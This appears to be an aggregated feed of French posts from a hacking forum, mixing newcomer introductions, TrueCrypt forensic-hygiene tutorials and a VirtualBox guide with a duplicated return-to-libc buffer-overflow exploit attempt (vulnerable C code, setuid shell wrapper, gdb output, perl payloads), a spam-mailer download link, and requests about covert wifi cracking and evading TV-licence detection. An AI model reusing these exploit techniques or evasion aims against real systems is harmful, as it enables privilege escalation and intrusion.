jeudi 30 avril 2015

News pirater un wifi sans se faire prendre

quelques techniques efficaces pour pirater un wifi sécuriser sans se faire prendre HADA


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Q56y9w
via IFTTT

Quelles ressources pour apprendre le réseau ?

Bonsoir à tous :)
Je suis étudiant en informatique plutôt orienté développement applicatif mais je commence à me rendre compte qu'il est nécessaire de savoir se protéger et surtout de sécuriser ses applications. Pour cela, j'ai commencé à me renseigner sur la cybersécurité et je suis tombé sur ce forum (j'y était déjà inscrit) :) Mais je me suis aussi aperçu que pour progresser en cybersécurité, il fallait maîtriser le fonctionnement des réseaux informatiques.
Auriez vous des ressources à me conseiller pour me former ?

Merci d'avance :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OJPUze
via IFTTT

Présentation Multit4sker

Pseudo (+autres si plusieurs) : Multit4sker
Connaissances informatiques générales : Développement Logiciel (Python, C#, C, Java, Vb.Net), Développement web (HTML/CSS, JS ( + Jquery), PHP/SQL), Développement Mobile
Connaissances en hacking : Notions
Système d'exploitation principal : Windows 7
Je viens sur ce forum pour : Apprendre les bases du hacking (d'ailleurs j'ai commencé à lire le livre :p), Apprendre à mieux me protéger sur le web, Sécuriser mes applications, Transmettre mes connaissances en développement et en hacking ( à l'avenir )
J'ai connu ce forum via : Google ?
Informations supplémentaires (job, intérêts, autres...) :
Je suis étudiant en première année à SUPINFO (école d'informatique). J'aime beaucoup lire et acquérir de nouvelles connaissances (en ce moment : Sécurité informatique, systèmes Unix, Algorithmique).


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OJPWXC
via IFTTT

News New PHP Mailer Priv8

Bonjour
Aujourd'hui, je vais vous donner un nouveau look PHP Mailer Priv8 et je vous conseille d'expérimenter avec de nouvelles fonctionnalités

image



Le lien de téléchargement gratuit

ici:http://ift.tt/1PaxGBQ


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Is0R3n
via IFTTT

mercredi 29 avril 2015

Mail HTML

bonjour à tous

j'ai une page mail que j'ai crée et que j'aimerais envoyer par mail mais pas en pièce jointe
en fait j'aimerais coller la page dans un message, pour faire genre une newsletter
j'ai essayé des trucs comme internet explorer qui permets de faire ça avec outlook
mais cela ne fonctionne pas.
en fait j'aimerais trouver une solution rapide et pas me taper des pages de code...
avez vous une solution svp
merci
cordialement
oliver


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1DXNjGk
via IFTTT

Historique Google

ca concerne tout les systeme d'exploitation, Google a mis place récemment une nouvelle fonctionnalité qui vous permet de visualiser et de télécharger l’intégralité de votre historique de recherche.

lorsque vous naviguez sur le web avec votre compte google activé, regardez des vidéos su youtube, etc etc... tout est archivé

maintenant on a la possibilité de voir et de télécharger une archive, qui regroupe toute vos recherches google,web, image, vidéo, localisation, etc etc...

si vous souhaitez jeter un œil a toutes vos recherche, c'est ici : http://ift.tt/Xp16Y4

vous pouvez bien évidement supprimer tout le contenu.


ps: on se rend compte que lorsqu'on supprime l'historique de son navigateur, certaine données pour google ne sont que partiellement supprimé, car elle sont sauvegardé dans votre archive.

source: http://ift.tt/1GGTJho


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1ESH2Th
via IFTTT

Contourner le Fichier ANCRAGES

Bonjour a tous,

Je repasse par ici car j'aimerais vous soumettre une question.

Pour détecter les petits malins qui ne payent pas la redevance tv (HS: je n'ai absolument pas envie de payer pour soutenir la pravda, sorte de chiasse visuelle et sonore, je regarde principalement RT, les émissions nature sur national geographic et gulli pour ma famille. Il y a certainement plus d'informations pertinentes de qualite dans petit ours brun va aux chiottes que dans le JT de FR3), le fisc dispose d'un fichier, appelle ANCRAGES, qui regroupe les informations relatives aux offres TV souscrites pas les abonnes.

Or, pour payer la redevance il faut, en plus d'avoir souscris a une offre TV, avoir un écran directement branche sur la box. L’opérateur a donc un moyen de vérifier a distance si l'abonne a branche une TV a la box.

Je suppose donc, dans le cas de la freebox révolution par exemple, qu'un branchement a la prise peritel du boitier video est detecte par la box puis transmise au FAI si besoin.

Question, comment faire pour regarder la TV sans détection évidente par le FAI ?

1 - Ne pas brancher la TV sur la prise peritel. Utiliser un routeur devant pour masquer la mac de la TV et utiliser les flux UPNP AV pour recuperer la video. C'est la solution la plus simple, mais... -> Problème, la lecture de ce flux n'est pas supporte par tous les modeles de TV connecte, la mienne en particulier.
2 - Bloquer les trames qui informent la box serveur de l'etat du boitier TV -> On oublie, c'est de la soupe binaire chiffree.
3 - Bloquer les trames en provenance du FAI qu interrogent la box -> Tres difficile, la box etant le modem, cela implique une démodulation, filtrage, puis remodulation des signaux propriaux (et possiblement chiffres) envoyés par le FAI.
4 - Rooter la box ou y flahser un nouveau firewire. Pas impossible, mais complique et treees gros et long projet. Hors de question en ce moment de m'investir sur un truc pareil.
5 - Solution alternative, remplacer la BOX par un vrai modem-routeur, brancher le boitier video au routeur et ne laisser passer vers le net (en supposant que le boitier TV puisse se passer de la freebox serveur) que les paquets qui vont bien (en priant pour que free ne fasse pas de chiffrement bout en bout).

Bref, je n'ai pour l'instant pas de solution évidente. Si vous y voyez plus clair, n'hesitez pas a repondre !

PS: Oups, etourdi que je suis, je me suis peut-etre trompe de rubrique ! Navre !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1ESmQ3M
via IFTTT

Hello

Salut c'est Bob,

Bon suis pas moche mais le personnage de South Park me fait marrer. Pas vous ? Bon tant pis.

Suis nul en informatique et j'ai besoin de vos conseils =)

Vais aller expliquer mon cas dans le bon topic.

Bisous tout partout.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1FytxXJ
via IFTTT

Se venger d'un arnaqueur

Yo ! J'ai un pote qui s'est fait arnaqué, j'ai le facebook de l'arnaqueur et un screen qui prouve ce qu'il a fait. J'aimerais connaitre les options qui s'offrent a moi pour soit lui faire payer, soit le forcer a rembourser l'argent qu'il a volé. Merci d'avance a ceux qui m'aideront


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1FytzP7
via IFTTT

Buffer Overflow : return to libc avec printf() et execl()

Bonjour,

Je tente d'apprendre et surtout de comprendre comment utiliser l'exploitation d'un buffer overflow en passant par libc plutôt que d'utiliser un shellcode.

J'ai suivi le tuto suivant : http://ift.tt/1Gt1WmR

L'ASLR est désactivé.

J'ai le code vulnérable suivant :
Code:

int main(int argc, char **argv) {
        char buffer[7];
        printf("Buffer is at: %08x\n", buffer);
        strcpy(buffer,argv[1]);
        printf("Ici\n");
        return 0;
}

Je le compile ainsi : gcc -o vuln2 vuln2.c

Le code que je tente d'appeler par execl() depuis libc est le suivant :
Code:

int main() {
        setuid(0);
        execl("/bin/sh","/bin/sh", 0);
}

Je le compile ainsi : gcc -o wrapper wrapper.c

Je créé deux variable environnement :
Code:

# export FMT="%3\$n"
# export FAV="/root/Desktop/code/c/elevation/wrapper"

L'offset avant écrasement de EIP est 19

L'exploitation est :
Code:

                          EIP
---------------------------------------------------------------------------
| Offset avant EIP(19) | printf() | execl() | FMT | FAV | FAV | NULL byte |
---------------------------------------------------------------------------

Je récupère les adresses nécessaire ainsi :
Code:

# gdb -q ./vuln2
Reading symbols from /root/Desktop/code/c/elevation/vuln2...done.
(gdb) b main
Breakpoint 1 at 0x8048485: file vuln2.c, line 3.
(gdb) run `perl -e 'print "A"x39'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/code/c/elevation/vuln2 `perl -e 'print "A"x39'`
warning: no loadable sections found in added symbol-file system-supplied DSO at 0xb7fe0000

Breakpoint 1, main (argc=2, argv=0xbffff4d4) at vuln2.c:3
3                printf("Buffer is at: %08x\n", buffer);
(gdb) x/s 0xbfffff75
0xbfffff75:        "%3$n"        => FMT
(gdb) x/s 0xbffffdd6
0xbffffdd6:        "/root/Desktop/code/c/elevation/wrapper"          => FAV
(gdb) p printf
$1 = {<text variable, no debug info>} 0xb7ea5c20 <printf>
(gdb) p execl
$2 = {<text variable, no debug info>} 0xb7efc610 <execl>
(gdb)c
Continuing.
Buffer is at: bffff419
Ici

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Donc :

- printf() => 0xb7ea5c20
- execl() found at b7efc610
- FMT is at 0xbfffff75
- FAV is at 0xbffffdd6

Il me manque mon adresse ou écrire 0 grâce à l'appel printf(FMT).
Dans GDB l'adresse de mon buffer est 0xbffff419 mais dans un terminal classique l'adresse est 0xbffff469:
Code:

# ./vuln2 `perl -e 'print "A"x39'`
Buffer is at: bffff469
Ici
Erreur de segmentation

Donc déjà ici, je ne sais pas laquelle est la bonne mais bon je pars avec 0xbffff469.
Je dois ajouter 19 (offset) + 20 (argument) pour atteindre l'adresse de mon NULL byte.
Cela donne donc : 0xbffff490

Je tente donc d'exploiter ainsi :
Code:

# ./vuln2 `perl -e 'print "A"x19 ."\x20\x5c\xea\xb7"."\x10\xc6\xef\xb7"."\x75\xff\xff\xbf"."\xd6\xfd\xff\xbf"."\xd6\xfd\xff\xbf"."\x90\xf4\xff\xbf"'`
Buffer is at: bffff469
Ici
Erreur de segmentation
# dmesg
[23506.634482] vuln2[9265]: segfault at 414140fd ip b7e86416 sp bffff47c error 6 in libc-2.13.so[b7e5c000+15e000]

dans gdb :
Code:

# gdb -q ./vuln2
Reading symbols from /root/Desktop/code/c/elevation/vuln2...done.
(gdb) run `perl -e 'print "A"x19 ."\x20\x5c\xea\xb7"."\x10\xc6\xef\xb7"."\x75\xff\xff\xbf"."\xd6\xfd\xff\xbf"."\xd6\xfd\xff\xbf"."\x90\xf4\xff\xbf"'`
Starting program: /root/Desktop/code/c/elevation/vuln2 `perl -e 'print "A"x19 ."\x20\x5c\xea\xb7"."\x10\xc6\xef\xb7"."\x75\xff\xff\xbf"."\xd6\xfd\xff\xbf"."\xd6\xfd\xff\xbf"."\x90\xf4\xff\xbf"'`
warning: no loadable sections found in added symbol-file system-supplied DSO at 0xb7fe0000
Buffer is at: bffff419
Ici

Program received signal SIGSEGV, Segmentation fault.
0xb7e86416 in _setjmp () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
(gdb)

Auriez-vous une idée du problème ?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1FxjrWM
via IFTTT

mardi 28 avril 2015

Sniffing réseau

Hi Guys !
En apprentissage, j'ai commencé à lire le Chapitre sur le Sniffing Réseau. J'aimerai que quelqu'un me fasse si possible un bref résumé car il se pourrait que j'ai pas saisi l'essentiel. Je vais terminer par les sit sur les tutos du cours. Les sits mentionné ont changé et les interfaces ne sont plus les memes. Du coup un peu déboussolé.

Merci de bien m'apporté de l'aide !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1HWkcup
via IFTTT

Problème mdp pour formater windows 7

Salut,

j'ai un problème lorsque je veux formater mon pc windows 7, lorsque j'appui sur F8, je fais restaurer le système et après il me demande un mot de passe pour le compte administrateur, mais je ne le connais pas,
y a t-il moyen de le faire sauter ?
Je n'ai accée à aucunes sessions.
Merci,
Nozx.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1bAqwtL
via IFTTT

return to libc avec printf() et execl()

Bonjour,

Je tente d'apprendre et surtout de comprendre comment utiliser l'exploitation d'un buffer overflow en passant par libc plutôt que d'utiliser un shellcode.

J'ai suivi le tuto suivant : http://ift.tt/1Gt1WmR

L'ASLR est désactivé.

J'ai le code vulnérable suivant :
Code:

int main(int argc, char **argv) {
        char buffer[7];
        printf("Buffer is at: %08x\n", buffer);
        strcpy(buffer,argv[1]);
        printf("Ici\n");
        return 0;
}

Je le compile ainsi : gcc -o vuln2 vuln2.c

Le code que je tente d'appeler par execl() depuis libc est le suivant :
Code:

int main() {
        setuid(0);
        execl("/bin/sh","/bin/sh", 0);
}

Je le compile ainsi : gcc -o wrapper wrapper.c

Je créé deux variable environnement :
Code:

# export FMT="%3\$n"
# export FAV="/root/Desktop/code/c/elevation/wrapper"

L'offset avant écrasement de EIP est 19

L'exploitation est :
Code:

                          EIP
---------------------------------------------------------------------------
| Offset avant EIP(19) | printf() | execl() | FMT | FAV | FAV | NULL byte |
---------------------------------------------------------------------------

Je récupère les adresses nécessaire ainsi :
Code:

# gdb -q ./vuln2
Reading symbols from /root/Desktop/code/c/elevation/vuln2...done.
(gdb) b main
Breakpoint 1 at 0x8048485: file vuln2.c, line 3.
(gdb) run `perl -e 'print "A"x39'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/code/c/elevation/vuln2 `perl -e 'print "A"x39'`
warning: no loadable sections found in added symbol-file system-supplied DSO at 0xb7fe0000

Breakpoint 1, main (argc=2, argv=0xbffff4d4) at vuln2.c:3
3                printf("Buffer is at: %08x\n", buffer);
(gdb) x/s 0xbfffff75
0xbfffff75:        "%3$n"        => FMT
(gdb) x/s 0xbffffdd6
0xbffffdd6:        "/root/Desktop/code/c/elevation/wrapper"          => FAV
(gdb) p printf
$1 = {<text variable, no debug info>} 0xb7ea5c20 <printf>
(gdb) p execl
$2 = {<text variable, no debug info>} 0xb7efc610 <execl>
(gdb)c
Continuing.
Buffer is at: bffff419
Ici

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Donc :

- printf() => 0xb7ea5c20
- execl() found at b7efc610
- FMT is at 0xbfffff75
- FAV is at 0xbffffdd6

Il me manque mon adresse ou écrire 0 grâce à l'appel printf(FMT).
Dans GDB l'adresse de mon buffer est 0xbffff419 mais dans un terminal classique l'adresse est 0xbffff469:
Code:

# ./vuln2 `perl -e 'print "A"x39'`
Buffer is at: bffff469
Ici
Erreur de segmentation

Donc déjà ici, je ne sais pas laquelle est la bonne mais bon je pars avec 0xbffff469.
Je dois ajouter 19 (offset) + 20 (argument) pour atteindre l'adresse de mon NULL byte.
Cela donne donc : 0xbffff490

Je tente donc d'exploiter ainsi :
Code:

# ./vuln2 `perl -e 'print "A"x19 ."\x20\x5c\xea\xb7"."\x10\xc6\xef\xb7"."\x75\xff\xff\xbf"."\xd6\xfd\xff\xbf"."\xd6\xfd\xff\xbf"."\x90\xf4\xff\xbf"'`
Buffer is at: bffff469
Ici
Erreur de segmentation
# dmesg
[23506.634482] vuln2[9265]: segfault at 414140fd ip b7e86416 sp bffff47c error 6 in libc-2.13.so[b7e5c000+15e000]

dans gdb :
Code:

# gdb -q ./vuln2
Reading symbols from /root/Desktop/code/c/elevation/vuln2...done.
(gdb) run `perl -e 'print "A"x19 ."\x20\x5c\xea\xb7"."\x10\xc6\xef\xb7"."\x75\xff\xff\xbf"."\xd6\xfd\xff\xbf"."\xd6\xfd\xff\xbf"."\x90\xf4\xff\xbf"'`
Starting program: /root/Desktop/code/c/elevation/vuln2 `perl -e 'print "A"x19 ."\x20\x5c\xea\xb7"."\x10\xc6\xef\xb7"."\x75\xff\xff\xbf"."\xd6\xfd\xff\xbf"."\xd6\xfd\xff\xbf"."\x90\xf4\xff\xbf"'`
warning: no loadable sections found in added symbol-file system-supplied DSO at 0xb7fe0000
Buffer is at: bffff419
Ici

Program received signal SIGSEGV, Segmentation fault.
0xb7e86416 in _setjmp () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
(gdb)

Auriez-vous une idée du problème ?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1QFjCDU
via IFTTT

Scanneur SandCat CS sous dos

Salut, j'ai un ami qui m'a demandé d'essayer de lui scanner sont site pour voir si il y avait des failles.

Donc étant débutant dans la sécurité informatique, j'ai utilisé l'utilitaire SandCat CS sous dos.

Une fois le scan terminé, voici le résultat obtenu :

Check Name: index.html Common File/Folder
References (CWE): 200,219
References (OSVDB): 3233
Check ID: 13956
Risk: Medium
Location: http://ift.tt/1QFjzIg
Check Complete [cmfile:2F696E6465782E68746D6C]
Positive2 of 1260 [ /photos ]
Type: Vulnerability
Check Name: photos Common File/Folder
References (CWE): 200,219
References (OSVDB): 15096,15097,15098,15099,15100
Check ID: 14163
Risk: Medium
Location: http://ift.tt/1Gt1Uev
Check Complete [cmfile:2F70686F746F73]


Donc visiblement sa aurait détecter des vulnérabilité, mais le soucis c'est que connaissant pas vraiment SandCat je ne sais pas comment interpréter le résultat, pour en informer mon ami qui est le webmaster du site.

Tout aide est la bienvenue :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1QFjBQl
via IFTTT

Présentation TUQMAS

Bonjour

J'ai découvert votre forum grâce à google, car je rechercher un forum pour pouvoir échanger et en apprendre plus sur le hacking.

J'ai toujours été désireux dans apprendre sur le hacking et j'espère que ce forum sera à la hauteur de mes attentes.

Merci de m'accueillir ici.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Gt1W6n
via IFTTT

lundi 27 avril 2015

News Je n'arrive pas à installer Nessus sur Kali (Virtualbox)

Bonjour, les gars je me demande si quelqu'un pourrait m'aider à installer Nessus sur Kali Linux via Virtual box.
Alors déjà sur ma virtual box, j'ai installé Kali Linux, système d'exploitation 2.4 64 bits, dès que je démarre le système Kali, je choisis AMD 64, une fois qu'il est démarré, j'essaye d'installer Nessus sur le terminale avec la commande " apt-get install Nessus " ça ne marche pas, il est écrit " Unable to locate ... ", donc ensuite j'ai préféré faire à old fashion way, je télécharge Nessus sur le site Tenable en 64 bits donc je tape dans le terminal: " cd Desktop ", il m'affiche le nom du programme Nessus, en suite je copie celui-ci, je tape "dpkg - i" et je colle le nom du programme. Donc après ça, tous les plugins sont chargés, je clique sur "/etc/init.d/le nom du programme nessus ", j'ouvre une autre page de terminal et j'effectue la commande, ensuite je vais sur le site Tenable, je m'inscris et tout, je reçois l'email mais ça ne marche pas, je ne peux pas me login sur le site pourtant, j'ai reçu l'email du code d’activation et tout. Si quelqu'un a rencontré ce problème et il sait comment y remédier dit-le moi.(OS de base windows 7)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1EJ2hqx
via IFTTT

HTTP response splitting

Salut à tous,

Ces derniers jours je tente de comprendre l'utilisation de la faille http response splitting.
Il existe beaucoup de tutos, tous avec des injections différentes mais aucun n'explique vraiment comment s'adapter au site.

J'ai essayé de créer un petit site pour tester la faille:
- type d'url vers la page : http://ift.tt/1ze3Nih
- la réponse normale du serveur : http://ift.tt/1ze3Pqv
- l'injection décodée : http://ift.tt/1bKhYB9
- la réponse du serveur après injection : http://ift.tt/1GoqCgh

Comme on peut le voir, le Content-Length passe de 16 à 0 sans aucune raison.
Quelqu'un peut-il m'expliquer ce qu'il se passe et comment contourner ce problème pour afficher correctement le html ?

Merci d'avance :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1GoqE7V
via IFTTT

dimanche 26 avril 2015

TrueCrypt - Exemple d'erreur classique

Je complète mon explication sur TrueCrypt (http://ift.tt/1FpeLSS) avec l’exemple d’une erreur qui peut couter très chère…

J’ai créé un volume chiffré avec un nom banal afin de ne pas éveiller de soupçon en cas de découverte.

Le volume Boulot_entreprise contient ainsi un document Word beaucoup plus confidentiel qui est une liste d’opposants politique qui m’a été transmise par une connaissance quelconque (toujours pour le besoin du scénario :)).

On part du principe que je possède le mot de passe du volume en question et que je m’apprête à consulter ce document sous Windows en utilisant TrueCrypt 7.1a.
Je monte donc mon volume chiffré (qui est situé sur une clé USB), je consulte mon document quelques secondes en le laissant à sa place et sans jamais rien sauvegarder.

montage.PNG

Une fois avoir pris connaissance du document, je le referme ni vu ni connu avant de démonter le conteneur…

Je crois n’avoir laissé aucunes traces… Pourtant, je me suis bien fait avoir.

Word, ce faux ami.

Le problème vient cette fois-ci d’une fonction bien connue de Word… La sauvegarde de récupération :p.

Je me suis un peu attardé à la lecture du document qu’on m’a transmis… Word réalise une sauvegarde de récupération du document automatiquement (par défaut toute les 10 minutes) le tout de manière transparente et dans un dossier temporaire. Chez moi comme chez beaucoup d’autres cette valeur est par ailleurs souvent plus faible (moins de 5 minutes).

larnaqueword.PNG

Le problème est donc qu’il existe maintenant une copie complète du document stocké et consultable librement sur mon ordinateur… La protection forte pensée pour mon volume chiffré se retrouve mise à mal par cette erreur stupide.

Cette copie est entièrement consultable depuis le répertoire "Temp" de Word. Par défaut celui-ci se trouve sous :

C:/users/mon_nom/AppData/Roaming/Microsoft/Word/


cheminfoutu.jpg

foutu.jpg



Toujours penser à la sécurité de l’environnement.


Même supprimé par la suite la copie du document stocké par word restera potentiellement un problème. Elle pourra en effet être retrouvée avec des logiciels spécialisés. S’il y a beaucoup à cacher il faudra peut-être réaliser un effacement sécurisé du disque :(.

Pour éviter tout problème de ce type et si la situation impose une grande prudence vis-à-vis des fichiers chiffrés, pensez à toujours utiliser un live CD tel que Parted Magic comme moyen de consultation des documents confidentiels (http://ift.tt/1FpeLSS).

PuppetMaster.
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1FpeNKE
via IFTTT

Tutoriel Explication, accès sécurisé à un volume TrueCrypt

Bonjour, ancien membre du forum je présente aujourd’hui une méthode relativement classique et simple permettant l’accès sécurisé à des fichiers chiffrés avec TrueCrypt.

Où est le problème ? Rien de nouveau… Autant simplement chiffrer les fichiers avec truecrypt et puis c’est bon ? Avec un mot de passe fort ça passe ? Personne ne saura ce que peut bien contenir mon volume ?

Hé bien non, l’un des problèmes classiques en sécurité réside dans la méthode d’accès au fichier chiffré et non dans le chiffrement en lui-même.
Je présente ici quelques cas concrets qui permettent très simplement à un enquêteur, par exemple, de monter facilement un début de « chain of custody » autrement dit une suite d’évidence à votre encontre dans le cas où pourtant, vous pensiez avoir pris en compte toutes les mesures nécessaires pour vous en prémunir.
Dans la deuxième partie, je montre une méthode simple basé sur l’utilisation du liveCD « Parted Magic », qui me permet d’accéder de manière sure aux fichiers.

Démonstration en image du problème :

J’ai créé ici le volume « Boulot_Entreprise » sous windows, le fichier a été chiffré au moyen d’un algorithme fort sous TrueCrypt, son nom a été choisi pour ne pas éveiller de soupçons particuliers quant à son contenu. Le mot de passe choisit est donc : « A1t4J5l6M3o5I3y6BjGdTrYjBfTuBNf;, » ce qui rend le volume théoriquement inviolable en bruteforce.
Ce volume contient en réalité un fichier word nommé « liste_des_dissidents », ainsi qu’un autre fichier .avi nommé « camera_cache_regime.avi » pour le scénario.

Volume créé.PNG


On part du principe que les fichiers sont consultés relativement régulièrement et sous l’OS, ce que 95 % des gens font avec TrueCrypt.

Comment l’informatique légale peut donc me permettre dans ce cas de prouvé en partie la culpabilité du suspect ?

Mettons-nous dans la peau de celui qui recherche ici un élément compromettant. Dans ce cas précis, Le suspect a ainsi de grandes chances d’utiliser l’OS afin de pouvoir consulter régulièrement ou non ses fichiers.
A partir de ce postulat, il m’est déjà possible si je connais un peu le nom des fichiers incriminés de faire une première analyse.
Le volume étant démonté, l’utilisation de l’historique de Windows pour les documents récemment ouverts est un premier indice :

history.jpg


Ici on retrouve la consultation de fichiers au nom suspect. Si les fichiers portent un nom atypique et explicite comme c’est le cas ci-dessus, vous êtes déjà mal :).

Oui très bien du coup je désactive l’historique des fichiers récemment ouvert sous windows et c’est OK ? Nan ?

Non, le problème se pose dans de nombreux cas, ci-dessous par exemple, on retrouve sous vlc un historique du même ordre qui m’indique clairement la lecture récente d’un de mes documents chiffré, on note également un chemin suspect (P :/) qui peut me convaincre de la présence de ce document sur un volume chiffré (car généralement les périphériques pluggé sous windows garderont une même lettre d’accès. Ici P:/ n’appartient à aucun de mes périphériques, c’est un indice supplémentaire auquel vient s’ajouter l’heure d’accès etc.).

camera.jpg

Que puis-je faire contre tout cela ?

Rien de vraiment concluant si on utilise un OS classique (sur disque dur ou SSD). En effet, rien n’indique que des métadonnées qui concernent vos fichiers chiffrés ne s’envoleront pas ici et là au moment de l’ouverture avec tel ou tel programme (adobe reader ou autre). A partir du moment où ces données se retrouve même pour un très court laps de temps sous un dossier « TEMP/ » du disque dur elles peuvent être potentiellement retrouvé avec un logiciel de récupération adapté pour le grand publique.

Une solution intéressante à ce problème est l’utilisation d’un Live CD permettant de consulté vos données chiffrés et d’interagir avec celles-ci dans un environnement plus sécurisé.
L’avantage du Live CD est l’utilisation de la RAM qui est volatile et non d’un disque dur, ou autre périphérique qui permettrait de stocker des données confidentielles pour un long moment.


Utilisation de Parted Magic :

Parted Magic est une distribution linux bootable particulièrement utile et qui comprend, de base, l’utilitaire TrueCrypt.
C’est un bon point qui permet aux plus novices de lire des volumes chiffrés dans un environnement sure.
Une fois le bureau lancé, truecrypt se trouve dans la section Utilities de la barre de lancement rapide :

tcutilities.jpg


Les plus paranoïaques pourront débrancher leur câble Ethernet histoire de pousser le vice :).
Note importante : veillez à avoir le minimum nécessaire de ram pour lire vos fichiers.



Quelques points importants à prendre en compte pour l’utilisation TrueCrypt par rapport à ce tuto :

- Veillez à n’utiliser que la version TrueCrypt 7.1a , il s’agit de la dernière version sure en date avant « l’affaire TrueCrypt ».

- Evitez d’utiliser des méthodes de type « Auto-mount », ces méthodes sont intéressantes pour accéder automatiquement à un volume chiffré lors du démarrage de l’ordinateur. Elles sont donc totalement inappropriées dans notre contexte (lors de la saisie complète d’un ordinateur il deviendra extrêmement simple d’accéder au disque en bypassant l’identification windows).

- Ne jamais utiliser une méthode d’accès au fichier du type chiffrement de l’os que propose truecrypt. Cette méthode a déjà montré ses faiblesses. La principale faiblesse en question réside dans l’accès en RAM au niveau du BIOS (voir travaux réalisés sur internet). En revanche c’est une façon de faire très pratique pour éviter le vol de données après s’être fait voler un pc portable, par exemple.

- Toujours utiliser un mot de passe très fort, ça va de soi. Certains logiciels comme « Passware Kit Forensic » permettent de casser un mot de passe simple très rapidement pour truecrypt.

- Toujours renommer les fichiers chiffrés par des noms peu explicites est une bonne pratique.

- Ne jamais déplacer un fichier chiffré de son emplacement. S’il est déplacé en local, sur le bureau, il sera possible de le retrouver, même supprimé par la suite.

En résumé les méthodes retenus qui permettrons un accès sécurisé aux donnés sont le chiffrement complet d’un périphérique (DD ou clé USB) et le chiffrement simple d’un volume. Il n’y a pas d’inconvénient à utiliser la méthode du « volume caché » sous TrueCrypt.


Voilà, voilà.

PuppetMaster.
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1HJWa5Q
via IFTTT

Virtualisez vos services avec VirtualBox : Un serveur Web

Bonjour,

Aujourd'hui, je vous propose un petit tutoriel concernant la virtualisation de vos services à l'aide de VirtualBox.

Par là, j'entends, par exemple, la création d'un serveur Web tournant dans une machine virtuelle et natté sur les ports de votre machine physique. Et ce afin de rendre ce système complètement transparent.

Les avantages de cette techniques sont que :
  • Si la machine virtuelle est compromise, cela n'impacte pas la machine physique
  • Le service n'est lancé (et ne mange des ressources) que lorsque vous le souhaitez
  • Vous pouvez héberger un service par machine
  • ...


Les quelques désavantages sont que :
  • La processus de virtualisation est plus lourd que l'hébergement physique


Ce tutoriel demande toutefois un petit pré-requis : savoir installer un linux (Debian évidement).

Les interfaces réseau dans VirtualBox
Avant de commencer, il est nécessaire de comprendre différents modes de connexion réseau de VirtualBox (nous n'allons pas tous les voir):
  • Réseau interne : C'est un réseau créé par VirtualBox entre les machines virtuelles. Vous pouvez en créer plusieurs identéfiés par leur nom
  • Nat : C'est un réseau interne créé par VirtualBox. Ce dernier servant d'ailleurs de serveur DHCP. La différence avec le point précédant est que, dans ce mode, vous pouvez créer des redirections de port comme vous le feriez sur un routeur physique
  • Bridge : Dans ce mode, la machine virtuelle sera reconnue comme une machine réelle de votre réseau physique. Vous devez donc choisir sur quelle interface réseau cela devra être fait.


Dans notre cas, nous allons utiliser l'interface réseau en NAT.
Allez donc dans les réglages de votre machine virtuelle puis dans l'onglet réseau, finalement, ouvrez les réglages avancés.
Vous devriez avoir l'affichage suivant :
Cliquez ensuite sur "Port Forwarding" et opérez les réglages suivants :


Installation de la VM
Commencez par créer la machine virtuelle dans VirtualBox.
Après l'étape ci dessous laissez les valeurs par défaut. Elles conviendront parfaitement.

Une fois la création effectué, vous devez lier le fichier iso préalablement téléchargé (une Debian minimale conviendra parfaitement).

Pour ce faire, rendez vous à cet écran :
Cliquez alors sur le petit CD et choisissez votre ISO.

Démarrez alors la VM et procédez à l'installation de votre Linux.

Lors de cette installation vous pouvez toujours penser aux remarques suivantes :
  • Les LVMs cryptés c'est bien
  • Les interfaces graphiques c'est le mal
  • Installer le serveur Web à l'installation du système ce n'est pas du jeu.
  • Activez l'option permettant l'installation du serveur SSH lors de l'installation du système


Un premier test


Une fois la VM installée et correctement démarrée, passez sur la machine hôte et tentez de vous connecter sur le port 2222 du localhost. Vous devriez y parvenir et donc être au contrôle de la machine virtuelle.
Cela peut facilement se vérifier par le nom de la machine sur laquelle vous êtes connecté.

Faites quelques essais pour en avoir le coeur net.

Installation d'Apache

Une fois connecté en tant que root sur la machine virtuelle, installez y apache et MySQL :
Code:

aptitude install mysql-server apache2
Vérification de la bonne installation
